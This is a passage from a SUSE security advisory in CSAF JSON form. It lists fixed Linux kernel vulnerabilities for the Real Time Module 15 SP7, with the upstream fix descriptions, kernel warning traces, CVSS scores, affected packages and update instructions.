"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40328"
},
{
"cve": "CVE-2025-40350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40350"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ\n\nXDP programs can change the layout of an xdp_buff through\nbpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver\ncannot assume the size of the linear data area nor fragments. Fix the\nbug in mlx5 by generating skb according to xdp_buff after XDP programs\nrun.\n\nCurrently, when handling multi-buf XDP, the mlx5 driver assumes the\nlayout of an xdp_buff to be unchanged. That is, the linear data area\ncontinues to be empty and fragments remain the same. This may cause\nthe driver to generate erroneous skb or triggering a kernel\nwarning. When an XDP program added linear data through\nbpf_xdp_adjust_head(), the linear data will be ignored as\nmlx5e_build_linear_skb() builds an skb without linear data and then\npull data from fragments to fill the linear data area. When an XDP\nprogram has shrunk the non-linear data through bpf_xdp_adjust_tail(),\nthe delta passed to __pskb_pull_tail() may exceed the actual nonlinear\ndata size and trigger the BUG_ON in it.\n\nTo fix the issue, first record the original number of fragments. If the\nnumber of fragments changes after the XDP program runs, rewind the end\nfragment pointer by the difference and recalculate the truesize. Then,\nbuild the skb with the linear data area matching the xdp_buff. Finally,\nonly pull data in if there is non-linear data and fill the linear part\nup to 256 bytes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40350",
"url": "https://www.suse.com/security/cve/CVE-2025-40350"
},
{
"category": "external",
"summary": "SUSE Bug 1255260 for CVE-2025-40350",
"url": "https://bugzilla.suse.com/1255260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40350"
},
{
"cve": "CVE-2025-40355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40355"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysfs: check visibility before changing group attribute ownership\n\nSince commit 0c17270f9b92 (\"net: sysfs: Implement is_visible for\nphys_(port_id, port_name, switch_id)\"), __dev_change_net_namespace() can\nhit WARN_ON() when trying to change owner of a file that isn\u0027t visible.\nSee the trace below:\n\n WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30\n CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f\n Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025\n RIP: 0010:__dev_change_net_namespace+0xb89/0xc30\n [...]\n Call Trace:\n \u003cTASK\u003e\n ? if6_seq_show+0x30/0x50\n do_setlink.isra.0+0xc7/0x1270\n ? __nla_validate_parse+0x5c/0xcc0\n ? security_capable+0x94/0x1a0\n rtnl_newlink+0x858/0xc20\n ? update_curr+0x8e/0x1c0\n ? update_entity_lag+0x71/0x80\n ? sched_balance_newidle+0x358/0x450\n ? psi_task_switch+0x113/0x2a0\n ? __pfx_rtnl_newlink+0x10/0x10\n rtnetlink_rcv_msg+0x346/0x3e0\n ? sched_clock+0x10/0x30\n ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x59/0x110\n netlink_unicast+0x285/0x3c0\n ? __alloc_skb+0xdb/0x1a0\n netlink_sendmsg+0x20d/0x430\n ____sys_sendmsg+0x39f/0x3d0\n ? import_iovec+0x2f/0x40\n ___sys_sendmsg+0x99/0xe0\n __sys_sendmsg+0x8a/0xf0\n do_syscall_64+0x81/0x970\n ? __sys_bind+0xe3/0x110\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? sock_alloc_file+0x63/0xc0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? alloc_fd+0x12e/0x190\n ? put_unused_fd+0x2a/0x70\n ? do_sys_openat2+0xa2/0xe0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n \u003c/TASK\u003e\n\nFix this by checking is_visible() before trying to touch the attribute.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40355",
"url": "https://www.suse.com/security/cve/CVE-2025-40355"
},
{
"category": "external",
"summary": "SUSE Bug 1255261 for CVE-2025-40355",
"url": "https://bugzilla.suse.com/1255261"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40355"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Ensure XFD state on signal delivery\n\nSean reported [1] the following splat when running KVM tests:\n\n WARNING: CPU: 232 PID: 15391 at xfd_validate_state+0x65/0x70\n Call Trace:\n \u003cTASK\u003e\n fpu__clear_user_states+0x9c/0x100\n arch_do_signal_or_restart+0x142/0x210\n exit_to_user_mode_loop+0x55/0x100\n do_syscall_64+0x205/0x2c0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nChao further identified [2] a reproducible scenario involving signal\ndelivery: a non-AMX task is preempted by an AMX-enabled task which\nmodifies the XFD MSR.\n\nWhen the non-AMX task resumes and reloads XSTATE with init values,\na warning is triggered due to a mismatch between fpstate::xfd and the\nCPU\u0027s current XFD state. fpu__clear_user_states() does not currently\nre-synchronize the XFD state after such preemption.\n\nInvoke xfd_update_state() which detects and corrects the mismatch if\nthere is a dynamic feature.\n\nThis also benefits the sigreturn path, as fpu__restore_sig() may call\nfpu__clear_user_states() when the sigframe is inaccessible.\n\n[ dhansen: minor changelog munging ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68171",
"url": "https://www.suse.com/security/cve/CVE-2025-68171"
},
{
"category": "external",
"summary": "SUSE Bug 1255255 for CVE-2025-68171",
"url": "https://bugzilla.suse.com/1255255"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68171"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
